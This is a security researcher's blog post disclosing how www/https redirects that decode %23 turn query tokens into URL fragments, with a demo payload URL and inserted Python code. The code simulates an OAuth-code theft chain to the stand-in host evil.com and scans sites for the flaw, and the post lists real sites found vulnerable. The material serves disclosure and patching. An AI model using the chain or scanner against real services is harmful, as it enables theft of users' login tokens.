2 Jan 2014

Path Encoding Vulnerability in https/www redirects.

Playing with 302-based header injection (the majority of web servers is not vulnerable to it, by the way) I found one tricky, neat bug which can be really useful to leak ?query data by putting it in the #fragment.

A remark about the difference: the fragment might seem to be more secure than the query - no, I don't think so. There are just thousands of open redirects out there leaking access_tokens. I personally found an open redirect leaking the user's token on 2 out of 3 huge websites I checked. I only stopped looking for open redirects because I don't exploit and there's no market for "facebook access_tokens" (let's create one?)... whatever.

Yes, ?query can also leak through the Referer header, but that is easy to suppress; you can never be sure you have no open redirects.

Tip 1. Do not send sensitive info in the #fragment, because a 302 redirect will leak it: the browser carries the current fragment over to the Location target unless that target has a fragment of its own.

Problem: many web servers are configured to redirect http://site.com/%23lol to http://www.site.com/#lol. They decode the original path before building the Location header, so an encoded %23 becomes a real '#', and everything after it (including the ?query) ends up in location.hash. And this is a vulnerability.

To demonstrate the bug in the wild I created this demo. Hard Mode solution by the way: http://www.sakurity.com/issue_token?hard_mode=1&uri=http://sakurity.com/triple?to=//egorhomakov.com%2523

Any ?private_info can be turned into #private_info and then leaked easily with a 302 redirect.

The chain looks like this:
Provider issues a token -> Client-WWW-redirector%23?Token -> Client-redirector#?Token -> Evil#?Token.
There were basically only two places where servers could "screw up" path encoding: the https-related and the www-related redirects.
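The chain above, simulated as an added example (this is not the post's demo code): a www-redirector that decodes the request-target before building Location sits beside a hardened one that copies it through still percent-encoded, and a small browser model follows the 302s the way real browsers do, carrying the fragment over to a Location that has none. The hosts client.com, www.client.com and evil.com, the /out/<host>/ open redirect and the code value SECRET are all made up for the illustration.

```python
from urllib.parse import urljoin, urlsplit, urlunsplit, unquote

CLIENT_BARE = "http://client.com"        # hypothetical client origin
CLIENT_WWW = "http://www.client.com"     # where its www-redirector sends you


def www_redirect_vulnerable(raw_target):
    """Vulnerable www-redirector: decodes the raw request-target before
    rebuilding the URL, so '%23' in the path becomes a literal '#' and
    the ?query that followed it turns into a fragment."""
    return CLIENT_WWW + unquote(raw_target)


def www_redirect_safe(raw_target):
    """Hardened www-redirector: copies the request-target byte-for-byte
    (still percent-encoded), so %23 stays %23 and the query stays a query."""
    return CLIENT_WWW + raw_target


def open_redirect(url):
    """The client's separate, unrelated bug (hypothetical): /out/<host>/
    sends the visitor to http://<host>/ and ignores the query string."""
    parts = urlsplit(url).path.split("/")          # ['', 'out', host, ...]
    if len(parts) < 3 or parts[1] != "out":
        return None
    return "http://%s/" % parts[2]


def browser_follow(current_url, location):
    """Follow a 302 like a browser: resolve Location against the current
    URL and, if Location carries no fragment of its own, keep the current
    page's fragment (RFC 7231 section 7.1.2)."""
    target = urljoin(current_url, location)
    if "#" not in location:
        frag = urlsplit(current_url).fragment
        if frag:
            target = urlunsplit(urlsplit(target)._replace(fragment=frag))
    return target


def run_chain(redirector, redirect_uri, code):
    """The provider appends ?code=... to the registered redirect_uri; the
    browser then follows the www-redirect and the open redirect.
    Returns the final URL the browser lands on."""
    start = redirect_uri + "?code=" + code
    s = urlsplit(start)
    raw_target = s.path + ("?" + s.query if s.query else "")   # as the server sees it
    hop1 = browser_follow(start, redirector(raw_target))
    loc2 = open_redirect(hop1)
    return browser_follow(hop1, loc2) if loc2 else hop1


def leaked_code(final_url):
    """What JavaScript on the final page can read out of location.hash."""
    frag = urlsplit(final_url).fragment          # e.g. '?code=SECRET'
    for pair in frag.lstrip("?").split("&"):
        key, _, value = pair.partition("=")
        if key == "code":
            return value
    return None


if __name__ == "__main__":
    uri = CLIENT_BARE + "/out/evil.com/%23"   # redirect_uri registered by the attacker
    for name, redirector in (("vulnerable", www_redirect_vulnerable),
                             ("safe", www_redirect_safe)):
        final = run_chain(redirector, uri, "SECRET")
        print(name, "->", final, "| leaked:", leaked_code(final))
```

With the vulnerable redirector the browser ends on http://evil.com/#?code=SECRET, so evil.com reads the code from location.hash; with the hardened one the code never leaves the client's query string and the final URL is plain http://evil.com/.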

Tip 2. Check your https/http and www.site/site redirects (in whichever direction they go) to find the Path Encoding Vulnerability.

Let's check www-redirects against our Lazy list. Here is my lousy script.
For the "/?x=%23x" payload almost nobody is vulnerable, because encoding request.query when rebuilding the URL seems obvious to everyone.

http://www.olx.in/?x=#x
http://www.target.com?&x=#x
http://www.force.com/?x=#x
http://www.retailmenot.com/?x=#x
http://www.chip.de/?x=#x
http://store.steampowered.com/?x=#x
http://www.iminent.com?x=#x

Let's check '/%23x':

http://www.amazon.com/#x
http://www.bing.com/#x
http://www.microsoft.com/#x
http://www.msn.com/#x
http://www.ask.com/#x
http://www.amazon.co.jp/#x
http://stackoverflow.com/#x
http://www.cnn.com/#x
http://imgur.com/#x
http://www.huffingtonpost.com/#x
/Error/NotFound?aspxerrorpath=/#x
http://www.amazon.de/#x
http://www.about.com/#x
http://www.godaddy.com/#x
http://vimeo.com/#x
http://www.dailymail.co.uk/#x
http://www.amazon.co.uk/#x
http://www.aol.com/#x
http://kickass.to/#x/
http://www.globo.com/#x
http://www.aweber.com/#x
http://www.theguardian.com/#x
http://www.salesforce.com/#x
http://www.espncricinfo.com/#x
http://statcounter.com/#x/
http://www.warriorforum.com/#x
http://mashable.com/#x/
http://www.nbcnews.com/#x
http://www.shutterstock.com/#x
http://www.amazon.fr/#x
http://www.samsung.com/#x
http://www.popads.net/#x
http://pick.naver.jp/#x
http://www.usatoday.com/#x
http://stackexchange.com/#x
http://www.in.com/#x
http://bit.ly/a/warning?url=http%3a%2f%2fwww%2evirtual4now%2ecom&hash=#x
http://www.olx.in/#x
http://www.gsmarena.com/#x
http://www.ndtv.com/#x
http://www.ign.com/#x
http://www.varzesh3.com/#x
http://www.linkbucks.com/#x
http://www.webmd.com/#x
http://www.ig.com.br/#x
http://www.bitauto.com/#x/
http://www.hdfcbank.com/#x
http://www.dell.com/#x
http://www.force.com/#x
http://www.speedtest.net/#x
http://www.cbssports.com/#x
http://www.quora.com/#x
http://www.time.com/#x
http://www.amazon.cn/#x
http://www.retailmenot.com/#x
http://www.match.com/#x
http://subscene.com/#x
http://www.amazon.it/#x
http://abcnews.go.com/#x
http://www.timeanddate.com/#x
http://www.engadget.com/#x
http://www.corriere.it/#x
http://chaturbate.com/#x
http://www.swagbucks.com/#x
https://www4.gotomeeting.com/#x?Portal=gotomeeting.com
http://www.lemonde.fr/#x
http://www.chip.de/#x
http://www.hubspot.com/#x
http://www.pconline.com.cn/#x
http://www.marketwatch.com/#x
https://www.namecheap.com/#x
http://adultfriendfinder.com/#x
http://www.majesticseo.com/#x
http://msn.foxsports.com/#x
http://www.eventbrite.com/#x
http://www.virgilio.it/#x
http://www.tradedoubler.com/#x
http://www.autohome.com.cn/#x
http://persianblog.ir/#x
http://allrecipes.com/#x
http://www.lanacion.com.ar/#x
http://www.cbsnews.com/#x
http://www.tomshardware.com/#x
http://www.dict.cc/?s=#x
http://www.amazon.es/#x
http://www.pclady.com.cn/#x
http://vitaminl.tv/#x
http://www.spankwire.com/#x
http://www.ancestry.com/#x
http://ezinearticles.com/#x
http://www.aizhan.com/#x
http://www.rednet.cn/#x
http://www.mynet.com/#x
http://www.theverge.com/#x
http://www.allocine.fr/#x
http://www.pcbaby.com.cn/#x
http://www.chron.com/#x
/404.aspx?aspxerrorpath=/#x
http://myegy.com/#x
...I killed the script, it's only the first 500.
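The two probes behind the results above, reimplemented as an added example (this is not the author's script): it requests /%23x and /?x=%23x from the bare host without following the redirect and classifies the Location header as vulnerable (the %23 was decoded, so the marker now sits in the fragment), safe (the %23 survived) or other. The sample headers in the table are constructed to look like the results above, with example.com in place of real hosts; the network function only runs when you pass real hosts on the command line.

```python
import http.client
from urllib.parse import urlsplit

PAYLOADS = ("/%23x", "/?x=%23x")   # the two probes used in the post


def classify_location(location):
    """Classify a redirect's Location header for the '%23x' probe marker:
    'vulnerable' if %23 was decoded so the marker now lives in the fragment,
    'safe' if %23 came back intact, 'other' if the marker was dropped."""
    if not location:
        return "other"
    if "%23x" in location.lower():
        return "safe"
    if urlsplit(location).fragment.startswith("x"):   # '#x', '#x/', '#x?...'
        return "vulnerable"
    return "other"


def probe(host, payload, scheme="http", timeout=5):
    """GET <payload> from <host> without following redirects; return the raw
    Location header, or None if the answer is not a redirect."""
    conn_cls = (http.client.HTTPSConnection if scheme == "https"
                else http.client.HTTPConnection)
    conn = conn_cls(host, timeout=timeout)
    try:
        conn.request("GET", payload,
                     headers={"Host": host, "User-Agent": "path-encoding-check/0.1"})
        resp = conn.getresponse()
        resp.read()
        if resp.status in (301, 302, 303, 307, 308):
            return resp.getheader("Location")
        return None
    finally:
        conn.close()


def check_host(host, scheme="http"):
    """Run both probes against one bare host, e.g. check_host('example.com')."""
    return {p: classify_location(probe(host, p, scheme)) for p in PAYLOADS}


# Constructed sample Location headers, shaped like the results in the post
SAMPLE_LOCATIONS = {
    "http://www.example.com/#x": "vulnerable",
    "http://www.example.com/#x/": "vulnerable",
    "http://www.example.com/?x=#x": "vulnerable",
    "/Error/NotFound?aspxerrorpath=/#x": "vulnerable",
    "https://www.example.com/#x?Portal=example.com": "vulnerable",
    "http://www.example.com/%23x": "safe",
    "http://www.example.com/?x=%23x": "safe",
    "http://www.example.com/": "other",
    None: "other",
}


def self_check():
    """Classify the constructed samples; returns the ones that mismatch."""
    return {loc: classify_location(loc)
            for loc, want in SAMPLE_LOCATIONS.items()
            if classify_location(loc) != want}


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        for host in sys.argv[1:]:
            print(host, check_host(host))
    else:
        print("self-check mismatches:", self_check())
```

Run it against the bare (non-www, or http) hostname, since that is the side that issues the redirect; a 'vulnerable' verdict for /%23x means the redirector decodes the path before writing Location.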

Check whether your server turns %23 into # and patch it if you don't want your Single Sign On to be hacked: the redirect should copy the original, still-encoded request target into Location rather than rebuilding it from the decoded path.
Be careful with encodings. Many servers are configured the wrong way, and Microsoft IIS is vulnerable by default.